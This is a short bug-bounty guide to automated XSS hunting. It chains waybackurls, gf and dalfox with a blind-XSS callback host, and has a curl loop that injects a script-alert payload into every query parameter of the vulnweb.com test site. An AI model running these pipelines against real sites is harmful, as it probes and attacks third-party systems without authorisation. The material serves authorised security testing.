Automated XSS

Make sure you have Go installed on your Machine
To Install Go on your Machine:
  1) sudo apt install -y golang
  2) export GOROOT=/usr/lib/go
  3) export GOPATH=$HOME/go
  4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
  5) source .bashrc
How to Hunt Blind XSS using Dalfox?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use GF patterns to find Possible XSS Vulnerable Parameters.
Use Dalfox to find XSS.
Steps :
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
How to Hunt Reflected XSS?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
Steps :
waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
Tools Download Links:-
1:- Dalfox​
2:- Waybackurls​
3:- GF​
4:- GF Patterns​
5:- qsreplace​
Find Script here : QuickXSS​
If you have any Questions, Reach out to me via Twitter​
Twitter : Fani Malik​
Twitter : Faizee Asad​

Last modified 1yr ago

Automated XSS

To Install Go on your Machine:

How to Hunt Blind XSS using Dalfox?

How to Hunt Reflected XSS?

Tools Download Links:-

Twitter : Fani Malik​

Twitter : Faizee Asad​

Twitter : Fani Malik

Twitter : Faizee Asad